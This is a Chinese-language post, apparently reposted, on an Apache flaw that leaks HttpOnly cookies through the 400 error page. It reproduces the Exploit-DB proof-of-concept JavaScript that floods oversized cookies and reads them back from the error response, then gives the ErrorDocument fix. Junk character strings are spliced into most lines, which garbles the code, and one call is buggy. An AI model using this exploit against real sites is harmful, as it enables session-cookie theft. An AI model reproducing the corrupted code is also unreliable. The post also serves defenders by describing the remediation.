Apache HttpOnly Cookie XSS跨站漏洞

admin

很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。

8 X/ s3 ^' K' m. ^( i用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:


// http://www.exploit-db.com/exploits/18442/
+ ]9 c3 ?2 V$ ?function setCookies (good) {
// Construct string for cookie value
! ^$ x( L  j; g! C5 G* O' yvar str = "";
2 A, [' [; |3 f8 F! Yfor (var i=0; i< 819; i++) {
str += "x";
  a2 |. l/ L& N  v$ b) K! m' j}
9 n9 o' y3 g# _4 e// Set cookies
for (i = 0; i < 10; i++) {
4 [) o. H9 s- l5 I9 D- f0 P// Expire evil cookie
4 U+ \, Y" a/ B# R) U3 k+ c% zif (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
) i( b. J/ W0 r) P) q+ N- m}
( p0 l* h; F) Z// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
. J1 B4 B, y4 I+ _1 udocument.cookie = cookie;
1 w( x4 D6 n1 q' I7 G0 s}
}
function makeRequest() {
setCookies();
function parseCookies () {
; ?. L+ c; z3 I7 p6 xvar cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
# p- z0 y" E; Z* }0 Qvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
3 }" `6 _$ {) C) g1 nvar s_c = cookies.split('=',2);
cookie_dict[s_c[0]] = s_c[1];
9 ]9 ^1 V' i! w( i}
% X8 F. y4 B* u; p6 `, o9 U}
8 S, C- X# e6 f& c& X" O// Unset malicious cookies
% o! w/ o5 i7 u( v- c  a5 lsetCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
$ R4 Y$ K; i$ b" w. }: b// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
; s/ V! R/ @: S' P3 d* Gxhr.send(null);
6 h% t2 e' ]" A4 X0 b7 R2 H  B. ^}
4 C- F# d8 p0 C3 B. t! E7 GmakeRequest();

你就能看见华丽丽的400错误包含着cookie信息。

  Z& k( r* q; ~3 i下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
- x' r3 K6 S5 s& P. t( U) b. F. |
修复方案：

Apache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下

In the event of a problem or error, Apachecan be configured to do one of four things,

1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
2. output acustomized message输出一段信息
9 P; ?7 j* l2 ^, l( O8 `3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
! Y. W; z" M" b# U  y: u. h' _4. redirect to an external URL to handle theproblem/error转向一个外部URL
1 N1 O4 _7 S5 r
经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容
6 b, t0 H; U1 r0 V& a9 j
4 p( u& M& z; L/ E3 H+ `" l+ r2 k& zApache配置：

ErrorDocument400 " security test"

当然，升级apache到最新也可：）。
4 w) _& Q1 S; ~* d3 h# Y- x
' S3 N9 y# b) L0 B2 V参考：http://httpd.apache.org/security/vulnerabilities_22.html
- Z1 C1 E. N+ P1 p# K* H& O
; @1 E0 N0 j) U) l